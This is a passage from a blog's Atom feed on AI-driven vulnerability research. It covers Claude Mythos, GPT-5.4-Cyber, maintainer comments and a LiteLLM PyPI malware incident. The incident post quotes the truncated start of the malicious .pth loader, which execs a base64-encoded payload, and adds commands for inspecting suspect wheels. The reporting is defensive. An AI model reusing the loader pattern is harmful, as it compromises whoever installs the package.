<?xml version="1.0" encoding="utf-8"?>
<feed xml:lang="en-us" xmlns="http://www.w3.org/2005/Atom"><title>Simon Willison's Weblog: ai-security-research</title><link href="http://simonwillison.net/" rel="alternate"/><link href="http://simonwillison.net/tags/ai-security-research.atom" rel="self"/><id>http://simonwillison.net/</id><updated>2026-04-14T21:23:59+00:00</updated><author><name>Simon Willison</name></author><entry><title>Trusted access for the next era of cyber defense</title><link href="https://simonwillison.net/2026/Apr/14/trusted-access-openai/#atom-tag" rel="alternate"/><published>2026-04-14T21:23:59+00:00</published><updated>2026-04-14T21:23:59+00:00</updated><id>https://simonwillison.net/2026/Apr/14/trusted-access-openai/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://openai.com/index/scaling-trusted-access-for-cyber-defense/"&gt;Trusted access for the next era of cyber defense&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
OpenAI's answer to &lt;a href="https://simonwillison.net/2026/Apr/7/project-glasswing/"&gt;Claude Mythos&lt;/a&gt; appears to be a new model called GPT-5.4-Cyber:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;In preparation for increasingly more capable models from OpenAI over the next few months, we are fine-tuning our models specifically to enable defensive cybersecurity use cases, starting today with a variant of GPT‑5.4 trained to be cyber-permissive: GPT‑5.4‑Cyber.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;They're also extending a program they launched in February (which I had missed) called &lt;a href="https://openai.com/index/trusted-access-for-cyber/"&gt;Trusted Access for Cyber&lt;/a&gt;, where users can verify their identity (via a photo of a government-issued ID processed by &lt;a href="https://withpersona.com/"&gt;Persona&lt;/a&gt;) to gain "reduced friction" access to OpenAI's models for cybersecurity work.&lt;/p&gt;
&lt;p&gt;Honestly, this OpenAI announcement is difficult to follow. Unsurprisingly they don't mention Anthropic at all, but much of the piece emphasizes their many years of existing cybersecurity work and their goal to "democratize access" to these tools, hence the emphasis on that self-service verification flow from February.&lt;/p&gt;
&lt;p&gt;If you want access to their best security tools you still need to go through an extra Google Form application process though, which doesn't feel particularly different to me from Anthropic's &lt;a href="https://www.anthropic.com/glasswing"&gt;Project Glasswing&lt;/a&gt;.

    &lt;p&gt;&lt;small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=47770770"&gt;Hacker News&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/openai"&gt;openai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/anthropic"&gt;anthropic&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;&lt;/p&gt;



</summary><category term="security"/><category term="ai"/><category term="openai"/><category term="generative-ai"/><category term="llms"/><category term="anthropic"/><category term="ai-security-research"/></entry><entry><title>Cybersecurity Looks Like Proof of Work Now</title><link href="https://simonwillison.net/2026/Apr/14/cybersecurity-proof-of-work/#atom-tag" rel="alternate"/><published>2026-04-14T19:41:48+00:00</published><updated>2026-04-14T19:41:48+00:00</updated><id>https://simonwillison.net/2026/Apr/14/cybersecurity-proof-of-work/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://www.dbreunig.com/2026/04/14/cybersecurity-is-proof-of-work-now.html"&gt;Cybersecurity Looks Like Proof of Work Now&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
The UK's AI Safety Institute recently published &lt;a href="https://www.aisi.gov.uk/blog/our-evaluation-of-claude-mythos-previews-cyber-capabilities"&gt;Our evaluation of Claude Mythos Preview’s cyber capabilities&lt;/a&gt;, their own independent analysis of &lt;a href="https://simonwillison.net/2026/Apr/7/project-glasswing/"&gt;Claude Mythos&lt;/a&gt; which backs up Anthropic's claims that it is exceptionally effective at identifying security vulnerabilities.&lt;/p&gt;
&lt;p&gt;Drew Breunig notes that AISI's report shows that the more tokens (and hence money) they spent, the better the results they got, which leads to a strong economic incentive to spend as much as possible on security reviews:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;If Mythos continues to find exploits so long as you keep throwing money at it, security is reduced to a brutally simple equation: &lt;strong&gt;to harden a system you need to spend more tokens discovering exploits than attackers will spend exploiting them&lt;/strong&gt;.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;An interesting result of this is that open source libraries become &lt;em&gt;more&lt;/em&gt; valuable, since the tokens spent securing them can be shared across all of their users. This directly counters the idea that the low cost of vibe-coding up a replacement for an open source library makes those open source projects less attractive.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/open-source"&gt;open-source&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/drew-breunig"&gt;drew-breunig&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/vibe-coding"&gt;vibe-coding&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;&lt;/p&gt;



</summary><category term="open-source"/><category term="ai"/><category term="generative-ai"/><category term="llms"/><category term="drew-breunig"/><category term="vibe-coding"/><category term="ai-security-research"/></entry><entry><title>Anthropic's Project Glasswing - restricting Claude Mythos to security researchers - sounds necessary to me</title><link href="https://simonwillison.net/2026/Apr/7/project-glasswing/#atom-tag" rel="alternate"/><published>2026-04-07T20:52:54+00:00</published><updated>2026-04-07T20:52:54+00:00</updated><id>https://simonwillison.net/2026/Apr/7/project-glasswing/#atom-tag</id><summary type="html">
    &lt;p&gt;Anthropic &lt;em&gt;didn't&lt;/em&gt; release their latest model, Claude Mythos (&lt;a href="https://www-cdn.anthropic.com/53566bf5440a10affd749724787c8913a2ae0841.pdf"&gt;system card PDF&lt;/a&gt;), today. They have instead made it available to a very restricted set of preview partners under their newly announced &lt;a href="https://www.anthropic.com/glasswing"&gt;Project Glasswing&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The model is a general purpose model, similar to Claude Opus 4.6, but Anthropic claim that its cyber-security research abilities are strong enough that they need to give the software industry as a whole time to prepare.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Mythos Preview has already found thousands of high-severity vulnerabilities, including some in &lt;em&gt;every major operating system and web browser&lt;/em&gt;. Given the rate of AI progress, it will not be long before such capabilities proliferate, potentially beyond actors who are committed to deploying them safely.&lt;/p&gt;
&lt;p&gt;[...]&lt;/p&gt;
&lt;p&gt;Project Glasswing partners will receive access to Claude Mythos Preview to find and fix vulnerabilities or weaknesses in their foundational systems—systems that represent a very large portion of the world’s shared cyberattack surface. We anticipate this work will focus on tasks like local vulnerability detection, black box testing of binaries, securing endpoints, and penetration testing of systems.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;There's a great deal more technical detail in &lt;a href="https://red.anthropic.com/2026/mythos-preview/"&gt;Assessing Claude Mythos Preview’s cybersecurity capabilities&lt;/a&gt; on the Anthropic Red Team blog:&lt;/p&gt;

&lt;blockquote&gt;&lt;p&gt;In one case, Mythos Preview wrote a web browser exploit that chained together four vulnerabilities, writing a complex &lt;a href="https://en.wikipedia.org/wiki/JIT_spraying"&gt;JIT heap spray&lt;/a&gt; that escaped both renderer and OS sandboxes. It autonomously obtained local privilege escalation exploits on Linux and other operating systems by exploiting subtle race conditions and KASLR-bypasses. And it autonomously wrote a remote code execution exploit on FreeBSD's NFS server that granted full root access to unauthenticated users by splitting a 20-gadget ROP chain over multiple packets.&lt;/p&gt;&lt;/blockquote&gt;
&lt;p&gt;Plus this comparison with Claude 4.6 Opus:&lt;/p&gt;
&lt;blockquote&gt;&lt;p&gt;Our internal evaluations showed that Opus 4.6 generally had a near-0% success rate at autonomous exploit development. But Mythos Preview is in a different league. For example, Opus 4.6 turned the vulnerabilities it had found in Mozilla’s Firefox 147 JavaScript engine—all patched in Firefox 148—into JavaScript shell exploits only two times out of several hundred attempts. We re-ran this experiment as a benchmark for Mythos Preview, which developed working exploits 181 times, and achieved register control on 29 more.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Saying "our model is too dangerous to release" is a great way to build buzz around a new model, but in this case I expect their caution is warranted.&lt;/p&gt;
&lt;p&gt;Just a few days ago (&lt;a href="https://simonwillison.net/2026/Apr/3/"&gt;last Friday&lt;/a&gt;) I started a new &lt;a href="https://simonwillison.net/tags/ai-security-research/"&gt;ai-security-research&lt;/a&gt; tag on this blog to acknowledge an uptick in credible security professionals sounding the alarm about how good modern LLMs have got at vulnerability research.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.theregister.com/2026/03/26/greg_kroahhartman_ai_kernel/"&gt;Greg Kroah-Hartman&lt;/a&gt; of the Linux kernel:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Months ago, we were getting what we called 'AI slop,' AI-generated security reports that were obviously wrong or low quality. It was kind of funny. It didn't really worry us.&lt;/p&gt;
&lt;p&gt;Something happened a month ago, and the world switched. Now we have real reports. All open source projects have real reports that are made with AI, but they're good, and they're real.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;a href="https://mastodon.social/@bagder/116336957584445742"&gt;Daniel Stenberg&lt;/a&gt; of &lt;code&gt;curl&lt;/code&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The challenge with AI in open source security has transitioned from an AI slop tsunami into more of a ... plain security report tsunami. Less slop but lots of reports. Many of them really good.&lt;/p&gt;
&lt;p&gt;I'm spending hours per day on this now. It's intense.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;And Thomas Ptacek published &lt;a href="https://sockpuppet.org/blog/2026/03/30/vulnerability-research-is-cooked/"&gt;Vulnerability Research Is Cooked&lt;/a&gt;, a post inspired by his &lt;a href="https://securitycryptographywhatever.com/2026/03/25/ai-bug-finding/"&gt;podcast conversation&lt;/a&gt; with Anthropic's Nicholas Carlini.&lt;/p&gt;
&lt;p&gt;Anthropic have a 5 minute &lt;a href="https://www.youtube.com/watch?v=INGOC6-LLv0"&gt;talking heads video&lt;/a&gt; describing the Glasswing project. Nicholas Carlini appears as one of those talking heads. Here's some of what he said (highlights mine):&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;It has the ability to chain together vulnerabilities. So what this means is you find two vulnerabilities, either of which doesn't really get you very much independently. But this model is able to create exploits out of three, four, or sometimes five vulnerabilities that in sequence give you some kind of very sophisticated end outcome. [...]&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;I've found more bugs in the last couple of weeks than I found in the rest of my life combined&lt;/strong&gt;. We've used the model to scan a bunch of open source code, and the thing that we went for first was operating systems, because this is the code that underlies the entire internet infrastructure. &lt;strong&gt;For OpenBSD, we found a bug that's been present for 27 years, where I can send a couple of pieces of data to any OpenBSD server and crash it&lt;/strong&gt;. On Linux, we found a number of vulnerabilities where as a user with no permissions, I can elevate myself to the administrator by just running some binary on my machine. For each of these bugs, we told the maintainers who actually run the software about them, and they went and fixed them and have deployed the patches so that anyone who runs the software is no longer vulnerable to these attacks.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I found this on the &lt;a href="https://www.openbsd.org/errata78.html"&gt;OpenBSD 7.8 errata page&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;025: RELIABILITY FIX: March 25, 2026&lt;/strong&gt;  &lt;em&gt;All architectures&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;TCP packets with invalid SACK options could crash the kernel.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://ftp.openbsd.org/pub/OpenBSD/patches/7.8/common/025_sack.patch.sig"&gt;A source code patch exists which remedies this problem.&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I tracked that change down in the &lt;a href="https://github.com/openbsd/src"&gt;GitHub mirror&lt;/a&gt; of the OpenBSD CVS repo (apparently they still use CVS!) and found it &lt;a href="https://github.com/openbsd/src/blame/master/sys/netinet/tcp_input.c#L2461"&gt;using git blame&lt;/a&gt;:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2026/openbsd-27-years.jpg" alt="Screenshot of a Git blame view of C source code around line 2455 showing TCP SACK hole validation logic. Code includes checks using SEQ_GT, SEQ_LT macros on fields like th-&amp;gt;th_ack, tp-&amp;gt;snd_una, sack.start, sack.end, tp-&amp;gt;snd_max, and tp-&amp;gt;snd_holes. Most commits are from 25–27 years ago with messages like &amp;quot;more SACK hole validity testin...&amp;quot; and &amp;quot;knf&amp;quot;, while one recent commit from 3 weeks ago (&amp;quot;Ignore TCP SACK packets wit...&amp;quot;) is highlighted with an orange left border, adding a new guard &amp;quot;if (SEQ_LT(sack.start, tp-&amp;gt;snd_una)) continue;&amp;quot;" style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;p&gt;Sure enough, the surrounding code is from 27 years ago.&lt;/p&gt;
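&lt;p&gt;If you want to repeat that archaeology yourself, something along these lines should work against the mirror (the line range is approximate, taken from the screenshot above):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;git clone https://github.com/openbsd/src
cd src
# Who last touched the SACK validation code, and when?
git blame -L 2450,2470 sys/netinet/tcp_input.c
# Or jump straight to the commit that added the new guard:
git log -S 'SEQ_LT(sack.start, tp-&amp;gt;snd_una)' --oneline -- sys/netinet/tcp_input.c
&lt;/code&gt;&lt;/pre&gt;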
&lt;p&gt;I'm not sure which Linux vulnerability Nicholas was describing, but it may have been &lt;a href="https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=5133b61aaf437e5f25b1b396b14242a6bb0508e2"&gt;this NFS one&lt;/a&gt; recently covered &lt;a href="https://mtlynch.io/claude-code-found-linux-vulnerability/"&gt;by Michael Lynch&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;There's enough smoke here that I believe there's a fire. It's not surprising to find vulnerabilities in decades-old software, especially given that they're mostly written in C, but what's new is that coding agents run by the latest frontier LLMs are proving tirelessly capable at digging up these issues.&lt;/p&gt;
&lt;p&gt;I actually thought to myself on Friday that this sounded like an industry-wide reckoning in the making, and that it might warrant a huge investment of time and money to get ahead of the inevitable barrage of vulnerabilities. Project Glasswing incorporates "$100M in usage credits ... as well as $4M in direct donations to open-source security organizations". Partners include AWS, Apple, Microsoft, Google, and the Linux Foundation. It would be great to see OpenAI involved as well - GPT-5.4 already has a strong reputation for finding security vulnerabilities and they have stronger models on the near horizon.&lt;/p&gt;
&lt;p&gt;The bad news for those of us who are &lt;em&gt;not&lt;/em&gt; trusted partners is this:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;We do not plan to make Claude Mythos Preview generally available, but our eventual goal is to enable our users to safely deploy Mythos-class models at scale—for cybersecurity purposes, but also for the myriad other benefits that such highly capable models will bring. To do so, we need to make progress in developing cybersecurity (and other) safeguards that detect and block the model’s most dangerous outputs. We plan to launch new safeguards with an upcoming Claude Opus model, allowing us to improve and refine them with a model that does not pose the same level of risk as Mythos Preview.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I can live with that. I think the security risks really are credible here, and having extra time for trusted teams to get ahead of them is a reasonable trade-off.&lt;/p&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/thomas-ptacek"&gt;thomas-ptacek&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/anthropic"&gt;anthropic&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/nicholas-carlini"&gt;nicholas-carlini&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-ethics"&gt;ai-ethics&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm-release"&gt;llm-release&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="security"/><category term="thomas-ptacek"/><category term="ai"/><category term="generative-ai"/><category term="llms"/><category term="anthropic"/><category term="nicholas-carlini"/><category term="ai-ethics"/><category term="llm-release"/><category term="ai-security-research"/></entry><entry><title>Vulnerability Research Is Cooked</title><link href="https://simonwillison.net/2026/Apr/3/vulnerability-research-is-cooked/#atom-tag" rel="alternate"/><published>2026-04-03T23:59:08+00:00</published><updated>2026-04-03T23:59:08+00:00</updated><id>https://simonwillison.net/2026/Apr/3/vulnerability-research-is-cooked/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://sockpuppet.org/blog/2026/03/30/vulnerability-research-is-cooked/"&gt;Vulnerability Research Is Cooked&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Thomas Ptacek's take on the sudden and enormous impact the latest frontier models are having on the field of vulnerability research.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Within the next few months, coding agents will drastically alter both the practice and the economics of exploit development. Frontier model improvement won’t be a slow burn, but rather a step function. Substantial amounts of high-impact vulnerability research (maybe even most of it) will happen simply by pointing an agent at a source tree and typing “find me zero days”.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Why are agents so good at this? A combination of baked-in knowledge, pattern matching ability and brute force:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;You can't design a better problem for an LLM agent than exploitation research.&lt;/p&gt;
&lt;p&gt;Before you feed it a single token of context, a frontier LLM already encodes supernatural amounts of correlation across vast bodies of source code. Is the Linux KVM hypervisor connected to the &lt;code&gt;hrtimer&lt;/code&gt; subsystem, &lt;code&gt;workqueue&lt;/code&gt;, or &lt;code&gt;perf_event&lt;/code&gt;? The model knows.&lt;/p&gt;
&lt;p&gt;Also baked into those model weights: the complete library of documented "bug classes" on which all exploit development builds: stale pointers, integer mishandling, type confusion, allocator grooming, and all the known ways of promoting a wild write to a controlled 64-bit read/write in Firefox.&lt;/p&gt;
&lt;p&gt;Vulnerabilities are found by pattern-matching bug classes and constraint-solving for reachability and exploitability. Precisely the implicit search problems that LLMs are most gifted at solving. Exploit outcomes are straightforwardly testable success/failure trials. An agent never gets bored and will search forever if you tell it to.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The article was partly inspired by &lt;a href="https://securitycryptographywhatever.com/2026/03/25/ai-bug-finding/"&gt;this episode of the Security Cryptography Whatever podcast&lt;/a&gt;, where David Adrian, Deirdre Connolly, and Thomas interviewed Anthropic's Nicholas Carlini for 1 hour 16 minutes.&lt;/p&gt;
&lt;p&gt;I just started a new tag here for &lt;a href="https://simonwillison.net/tags/ai-security-research/"&gt;ai-security-research&lt;/a&gt; - it's up to 11 posts already.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/thomas-ptacek"&gt;thomas-ptacek&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/careers"&gt;careers&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/nicholas-carlini"&gt;nicholas-carlini&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-ethics"&gt;ai-ethics&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;&lt;/p&gt;



</summary><category term="security"/><category term="thomas-ptacek"/><category term="careers"/><category term="ai"/><category term="generative-ai"/><category term="llms"/><category term="nicholas-carlini"/><category term="ai-ethics"/><category term="ai-security-research"/></entry><entry><title>Quoting Willy Tarreau</title><link href="https://simonwillison.net/2026/Apr/3/willy-tarreau/#atom-tag" rel="alternate"/><published>2026-04-03T21:48:22+00:00</published><updated>2026-04-03T21:48:22+00:00</updated><id>https://simonwillison.net/2026/Apr/3/willy-tarreau/#atom-tag</id><summary type="html">
    &lt;blockquote cite="https://lwn.net/Articles/1065620/"&gt;&lt;p&gt;On the kernel security list we've seen a huge bump of reports. We were between 2 and 3 per week maybe two years ago, then reached probably 10 a week over the last year with the only difference being only AI slop, and now since the beginning of the year we're around 5-10 per day depending on the days (fridays and tuesdays seem the worst). Now most of these reports are correct, to the point that we had to bring in more maintainers to help us.&lt;/p&gt;
&lt;p&gt;And we're now seeing on a daily basis something that never happened before: duplicate reports, or the same bug found by two different people using (possibly slightly) different tools.&lt;/p&gt;&lt;/blockquote&gt;
&lt;p class="cite"&gt;&amp;mdash; &lt;a href="https://lwn.net/Articles/1065620/"&gt;Willy Tarreau&lt;/a&gt;, Lead Software Developer. HAPROXY&lt;/p&gt;

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/linux"&gt;linux&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;&lt;/p&gt;



</summary><category term="security"/><category term="linux"/><category term="generative-ai"/><category term="ai"/><category term="llms"/><category term="ai-security-research"/></entry><entry><title>Quoting Daniel Stenberg</title><link href="https://simonwillison.net/2026/Apr/3/daniel-stenberg/#atom-tag" rel="alternate"/><published>2026-04-03T21:46:07+00:00</published><updated>2026-04-03T21:46:07+00:00</updated><id>https://simonwillison.net/2026/Apr/3/daniel-stenberg/#atom-tag</id><summary type="html">
    &lt;blockquote cite="https://mastodon.social/@bagder/116336957584445742"&gt;&lt;p&gt;The challenge with AI in open source security has transitioned from an AI slop tsunami into more of a ... plain security report tsunami. Less slop but lots of reports. Many of them really good.&lt;/p&gt;
&lt;p&gt;I'm spending hours per day on this now. It's intense.&lt;/p&gt;&lt;/blockquote&gt;
&lt;p class="cite"&gt;&amp;mdash; &lt;a href="https://mastodon.social/@bagder/116336957584445742"&gt;Daniel Stenberg&lt;/a&gt;, lead developer of cURL&lt;/p&gt;

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/daniel-stenberg"&gt;daniel-stenberg&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/curl"&gt;curl&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;&lt;/p&gt;



</summary><category term="daniel-stenberg"/><category term="security"/><category term="curl"/><category term="generative-ai"/><category term="ai"/><category term="llms"/><category term="ai-security-research"/></entry><entry><title>Quoting Greg Kroah-Hartman</title><link href="https://simonwillison.net/2026/Apr/3/greg-kroah-hartman/#atom-tag" rel="alternate"/><published>2026-04-03T21:44:41+00:00</published><updated>2026-04-03T21:44:41+00:00</updated><id>https://simonwillison.net/2026/Apr/3/greg-kroah-hartman/#atom-tag</id><summary type="html">
    &lt;blockquote cite="https://www.theregister.com/2026/03/26/greg_kroahhartman_ai_kernel/"&gt;&lt;p&gt;Months ago, we were getting what we called 'AI slop,' AI-generated security reports that were obviously wrong or low quality. It was kind of funny. It didn't really worry us.&lt;/p&gt;
&lt;p&gt;Something happened a month ago, and the world switched. Now we have real reports. All open source projects have real reports that are made with AI, but they're good, and they're real.&lt;/p&gt;&lt;/blockquote&gt;
&lt;p class="cite"&gt;&amp;mdash; &lt;a href="https://www.theregister.com/2026/03/26/greg_kroahhartman_ai_kernel/"&gt;Greg Kroah-Hartman&lt;/a&gt;, Linux kernel maintainer (&lt;a href="https://en.wikipedia.org/wiki/Greg_Kroah-Hartman"&gt;bio&lt;/a&gt;), in conversation with Steven J. Vaughan-Nichols&lt;/p&gt;

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/linux"&gt;linux&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;&lt;/p&gt;



</summary><category term="security"/><category term="linux"/><category term="generative-ai"/><category term="ai"/><category term="llms"/><category term="ai-security-research"/></entry><entry><title>My minute-by-minute response to the LiteLLM malware attack</title><link href="https://simonwillison.net/2026/Mar/26/response-to-the-litellm-malware-attack/#atom-tag" rel="alternate"/><published>2026-03-26T23:58:22+00:00</published><updated>2026-03-26T23:58:22+00:00</updated><id>https://simonwillison.net/2026/Mar/26/response-to-the-litellm-malware-attack/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://futuresearch.ai/blog/litellm-attack-transcript/"&gt;My minute-by-minute response to the LiteLLM malware attack&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Callum McMahon reported the &lt;a href="https://simonwillison.net/2026/Mar/24/malicious-litellm/"&gt;LiteLLM malware attack&lt;/a&gt; to PyPI. Here he shares the Claude transcripts that helped him confirm the compromise and decide what to do about it. Claude even suggested the PyPI security contact address after confirming the malicious code in a Docker container:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Confirmed&lt;/strong&gt;. Fresh download from PyPI right now in an isolated Docker container:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Inspecting: litellm-1.82.8-py3-none-any.whl
FOUND: litellm_init.pth
SIZE: 34628 bytes
FIRST 200 CHARS:
import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('aW1wb3J0IHN1YnByb2Nlc3MKaW1wb3J0IHRlbXBmaWxl...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The malicious &lt;code&gt;litellm==1.82.8&lt;/code&gt; is &lt;strong&gt;live on PyPI right now&lt;/strong&gt; and anyone installing or upgrading litellm will be infected. This needs to be reported to security@pypi.org immediately.&lt;/p&gt;
&lt;/blockquote&gt;
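&lt;p&gt;This kind of check is easy to run yourself against any suspect wheel - here's a rough sketch (that exact version has hopefully been yanked by now, so substitute whatever you want to inspect, and as Callum did use a disposable container or VM for anything you think might be malicious):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# Download the wheel without installing or importing anything from it
pip download --no-deps --only-binary :all: 'litellm==1.82.8' -d /tmp/wheel-check

# Wheels are zip files; .pth files are suspicious because site.py executes
# their import lines at interpreter startup
python -m zipfile -l /tmp/wheel-check/*.whl | grep '\.pth'

# Extract and read anything that turns up before deciding what to report
python -m zipfile -e /tmp/wheel-check/*.whl /tmp/wheel-check/extracted/
&lt;/code&gt;&lt;/pre&gt;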
&lt;p&gt;I was chuffed to see Callum use my &lt;a href="https://github.com/simonw/claude-code-transcripts"&gt;claude-code-transcripts&lt;/a&gt; tool to publish the transcript of the conversation.

    &lt;p&gt;&lt;small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=47531967"&gt;Hacker News&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/pypi"&gt;pypi&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude"&gt;claude&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/supply-chain"&gt;supply-chain&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;&lt;/p&gt;



</summary><category term="pypi"/><category term="security"/><category term="ai"/><category term="generative-ai"/><category term="llms"/><category term="claude"/><category term="supply-chain"/><category term="ai-security-research"/></entry><entry><title>Quoting Thomas Ptacek</title><link href="https://simonwillison.net/2026/Feb/8/thomas-ptacek/#atom-tag" rel="alternate"/><published>2026-02-08T02:25:53+00:00</published><updated>2026-02-08T02:25:53+00:00</updated><id>https://simonwillison.net/2026/Feb/8/thomas-ptacek/#atom-tag</id><summary type="html">
    &lt;blockquote cite="https://twitter.com/tqbf/status/2019493645888462993"&gt;&lt;p&gt;People on the orange site are laughing at this, assuming it's just an ad and that there's nothing to it. Vulnerability researchers I talk to do not think this is a joke. As an erstwhile vuln researcher myself: do not bet against LLMs on this.&lt;/p&gt;
